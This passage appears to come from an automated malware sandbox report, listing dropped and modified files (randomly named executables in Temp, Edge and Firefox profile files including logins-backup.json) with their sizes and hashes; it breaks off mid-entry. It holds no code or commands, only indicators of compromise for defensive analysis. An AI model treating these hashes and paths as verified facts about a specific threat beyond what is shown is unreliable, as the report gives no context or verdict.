                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  62461d8d8777a10f13db54d03bdd4120

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b2c5d8b04c08dee49ae503ee2b20bc07544a73fb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  df6f697caf1190f5d354896a745c4c038d1cb71ee963819634922cccaddde229

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  19af516be34adc8308837695a6f7fffb1c0f25873e83e79ee2bfca79f8fd3c6a3a933fdf5290497e6fbe961fb247a6eb074766beaeca66dce20284a8d9389a91

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  9010fe212d7da97a4e9cf63a903ee7a4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8f124a736d045eea3c50a9597d18c9af8b128e28

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c2956b77f9af9f4d79e0198d8a7e0a5b6f880b4d597dfeee25a3f56c05d11834

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f763ab3261592107fb19b7d6134c7f4d02e921258b1c72f1e0c69a95ee8ed9cc20498259a279cca9648bbd213a5234b965a9196865d465e1f975ee9242e36326

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  21320325bdfc20c6f4e4d136228fc9c5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7e96950811d7ddbc1daeb7341ddb9768980bf2b5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5e7ac2b978206a07d8b1841a2bd89eae4b466bcd8a0df3a62ae2ca0439b8bd5e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ee78316d5b8edffdc83e3431bdbd28ae05a481d2a445ddf3b7c58bf0f01c6c42aead46a4d91e7fc75519a5ca8a7e2bab78749d88476c7a2fa0a25e8b3592bd43

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  370B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c54d05d87a0b0654cf887d3bbe29d69b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1bba8b763c9f0df2f1488fef7d3d96d118974e22

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ffa3c79d03132288b7b9c653a5e8065f4045fe24b5ac5c6ff362fe0e1ed467fe

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  981147f0187589711e0e6a2e63c3a1661d0e90b6bf29b46ae5958ffb2361fa5e7e339e8204a0ab994ba5bb714a972c13523cb6d5adf61ebc0324ac890502ab3b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe61a131.TMP

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  370B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4c9da28bbdaa2bda3cd98190d9ddf5da

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  936d06fd0f339a65727029c1a807b30e2deca139

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bd16661f9b63c2c4b16b380257e7c98feee034f07f0d1184a2c9194f2b13a481

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  dd18cae76106c2cca8bf83ad96318a97cb9af7c45f6c26f7f95413b129e10edd5a24dd7604f65205f78c7019610482664fe03e133120d95c7388f21f23e6cc0f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  41B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  46295cac801e5d4857d09837238a6394

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c9e7b83d962d7205c90410f36ecdb913

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1aac65ab515b702ae65e3b884f60f73ec55bea94

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4df6c2428a80b5cea37d1c9f8a7c116f8dd52e31b348aecc4ea4ccff3ba775ed

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  20d706a59624651bab2c38069a98bc44764617663754d50657a4b1aa4a9822d942b2fb455e8751fb760a67f5e85e90d8e0d6853dd304c5bc4b42fb2b6d8ca5a7

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  11KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c639f5d03873bb9ecabe4c8b6fbf7e01

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  48dff2ee60dc1b58b35d84beb046243a13fa6d71

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5bb530882b3364089d396057edb63eea272d0818a8a25418407250af97bbef3d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b10940396d24a60f687e77d5dcb662d16df711342f2bdc5f6f6c13ee5a6a07555538ab4fbfd09882c508091aa6fc34dbc0ae08a18d6352a977b12099445b3bc6

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  896KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  de708a6fced82eac2670ef85188abbbe

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6e3445aaec4c000a9371672d454a0ae5a35f7631

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a01ff1d989e2904396fb5f44488dcc4dff4cbb66a328c5c062f706e35be129ce

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0d27c9dcf78c04f5d43e8b198ace4d1c005691673f0d9d44f5fa10ebcea1812635ffe5f80dca4b3c37f387a7d7c6229a386c727a5bb07ba039c81618aa240464

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7050d5ae8acfbe560fa11073fef8185d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  21KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  fc448e6e23412d6e3e9664cecef3df11

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  80fc48a0e5a01b13435f48da3fdd9ef3b578aec0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2ff8f2ccd3f7b445f27686f3c5fb9c166510e8ebc8ae3d6211c8c610baad743f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7f0353c5d7b21ba83009d603978d98eae4077f7a65d31f447db79bcb822752e40516df87f1f89c995d072910aceb29031b3e7a247f6b7af55e6068ac4d06e113

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\107613747.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  108KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1fcb78fb6cf9720e9d9494c42142d885

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1922222311.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  49KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6946486673f91392724e944be9ca9249

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e74009983ced1fa683cda30b52ae889bc2ca6395

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  885fbe678b117e5e0eace7c64980f6072c31290eb36d0e14953d6a2d12eff9cd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e3241f85def0efefd36b3ffb6722ab025e8523082e4cf3e7f35ff86a9a452b5a50454c3b9530dfdad3929f74a6e42bf2a2cf35e404af588f778e0579345b38c9

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2317815259.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  96509ab828867d81c1693b614b22f41d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c5f82005dbda43cedd86708cc5fc3635a781a67e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2649530790.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  cb8420e681f68db1bad5ed24e7b22114

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  416fc65d538d3622f5ca71c667a11df88a927c31

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\361837696227

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e4c72589db97db74f899ebcc3cf040a5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4c2814f61dc65891d9fa05dadf24dd755785d1fa

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4d68ee734c3d17ee89a6a7627e8f57245f75db18b5f8031332839447ed5f4d22

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e2b171520cde5342cc90d0152601e5736aeffc825be13273485ccfd0177295860f1520b1f4368bf6887709efb46f55b3caee8f911cd8f6d1bdc6cec6b6e86ba9

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Tmp3A40.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1420d30f964eac2c85b2ccfe968eebce

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzofbnj3.hoe.ps1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  479KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  09372174e83dbbf696ee732fd2e875bb

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ba360186ba650a769f9303f48b7200fb5eaccee1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  13.8MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  0a8747a2ac9ac08ae9508f36c6d75692

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b287a96fd6cc12433adb42193dfe06111c38eaf0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e34da85188f5b5c5fe7bf0734e740502

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fbc9ac18ff80e87e0bbb499ddb87ee32c852d575

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ab5f17d18f6ce638f68f297676bdc13b581bb52a773daa9595dcbcd9dc46bcdf

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b9e884fa70a5587f313978823a9526b74e883624a2ea27d22408a3c9679472fd274780c1a72be1acd9f6982a5b3fdec425966f8a017b27e4dcd2066959bd5511

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  92ae83206a9cfe495b94e8e0bfd78ed2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b7bb43d33ea8ae1a50431cd585eeb47665461051

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  204a05239aa7de6a09e0ffa963e1e186b28399f835addd5082c5d07ab72524bc

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e8162260ddb8ffbaedc28eeabd6e7729a935d42b5474bfd7c43e9334b398b5a7fdef3678eed29aba61a682b8804981d44799d47fab61cb5052d2e19df48c9b82

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\AlternateServices.bin

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e71c08be82d186276b1f030554e421a7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c2bc4f4d9ff2cae136c112b075b99c8a4383b2c5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f39370fcd01c5a5c6d90a5b93eb7f3483c1b50f97e1fdc05e16a4957e4fd91f9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e30bea207e55e86f9dc28990facc4b1f255c22a621685727ea98b6ea496c9930b4a114405554dc94ded645d529ac166ef00413b1c0cba9a765c24731f1f597f8

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  45f5dd0983f0317a84159d66a3480216

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  49ca9a8fdfe854236a0285b2622e117db6916205

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  34981999520333f0945b50fbb89f12bcbf99069dfc939613362c79386a7766ef

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a9ca488f3c673fa0d08a7ac4f696fa185d90f187e6235ebc715425e4d2f3a17733a9a4683f379547ed160e15f62dba061ac1f77199363f98cdf71ab477c22395

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  23KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b6da6cbc9baa487c05057c0867681096

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  db9c816bd19efe8f08774b0a4f0fbbb309a712b6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1e5ffa042083fcdcbca639b17525f6ce38ffee6411c762729d1828bf89b46da6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  aa5f962a76d077818f6e79f9058a62ddf3009ecd36747db6f5cb8b876248a58d9ac7dea1979be86dadf7a1f35b31bb560c02d2fcf20859bb6fe143d9a2ef390c

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  22KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  fb943147c40d12f9fbd90418d2920cf1

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c6137ac63207e389a08ed5fc278e1e2560253d5a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bb6aaddf868404d02ab5b31535215cfc4cdd6ac113cc691107a2aba6cd1960c4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0e5ac13f9115f75fc0ff2eb2c0157e4e5227f931c5eeafbba52a161c8a17a159a51dea663af0f0e04adece87951f741b93cf7e2d0bd4581d09889587928855cb

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  dd0cef208d79059d0361a7188d075608

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8c83516acbaabdd765f72c3547b9584a11e4de2b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1865bac86f04e10e7cb2c080e9794ea7af82f417fff35697d78a86ac564800b0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1ec6c8c01207827fe197ef227fd1fc71f9c46b986aa43001024528c539a3036471bc8d02c06317cb9bb205f92d1da35f451f36d0d2144bbe56bb2b9bb2107c34

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\pending_pings\3b157bbb-6bf9-4070-bf63-e78297983fbe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  671B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4a2892d92f64d1555710e44b889a0c80

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  78326fd032d232e0d63189a5e32c959a401d6285

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9a004bad2506cb0807205f1a7bdbfea0bb6427510f2118203c6d13f6271daf44

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8aead79993fe85794938586f207af28fc7e92cd50287e7346922f2b7964eeeb279c537201dd2fabf2343c0fe2c65a8e12111128a6c14aa41227ee52e470b79d1

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\pending_pings\bc673f13-2f86-4c0f-b4a1-7e4edaef0d4a

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  25KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  702a4ad2dea74fcc1116e0d4a25f4cc4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2ff5a67904fd9a69caaad404b0f18bdbb66db5c6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b9f04a55e1c22098a6ff7098a65dac4201fd1f0848da2d271b0b520628dc5c4a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  de0e9f36f8c127e69ebc424a7f9c4d98f17809d34377fd22ba1f51e3c6b52d752b219a6cc5b11c8a3bdcff348658821172eacf7e2536225d23b0002dac131ebc

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\datareporting\glean\pending_pings\bd0855de-776e-4f82-bf9b-c8bba10b44ce

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  982B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b9d049ef950ed8ef73dedb506bb2a164

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  97978f977bbc672c895ebbcdf0d2b5a72d4b025f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  6e385d99bed4086f57b5e7acca6caee594a3293276e3cfbd1b61b29f2d0567ce

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  040b11cf5553ff3b33b8f96dfb3cbc0b24140986911506b0d035a58d06287f40c39477c6784b9244ccc0e1d3e01966381794e89eff6b1af79b9970de17cc36e8

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.1MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  842039753bf41fa5e11b3a1383061a87

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  116B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2a461e9eb87fd1955cea740a3444ee7a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b10755914c713f5a4677494dbe8a686ed458c3c5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  372B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bf957ad58b55f64219ab3f793e374316

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  17.8MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  daf7ef3acccab478aaa7d6dc1c60f865

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\logins-backup.json

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  796B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  35b82f8ceefedcaf2534cd97b47059b8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e5e69d0f2485957d04d4ad05642cb25e73e3036b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  41f11e0432931e7dcc8d48b982a3ebd1f562c4b8aaede48df83c62210855007e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  dd83ed88310b17cd898a588858b25662896fc11807270282fe5a1cb72ab7cc0f531caa3187556f6b40b482b63ee3d4ec20fecbcc941b5dfcac69fcb59cd5b410

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\logins-backup.json

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  726B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e0fb4a7c92ca426e1e419c52990f81a3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  11e8dda8e019d9bf12ccb1600f65ccedbde82a1b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f5176eb4e18e2eb7cab89fbb43ec4422816a947191acad540a64d680559718bb

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2d11443e21aacdf82bdaeac1c869cb07bbda220785a330210d597d9a4375b7489d3bc75e19105c9c8cb3eadaad33700d61cf723674784621a6cb410654db0516

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f1lggfg7.default-release\prefs-1.js

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b806fa9decce680ba481b50051625325

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b23e0506e827d2c56bf4545e308ce2404fcbd1c0

                                                                                                                                                                                  SHA256

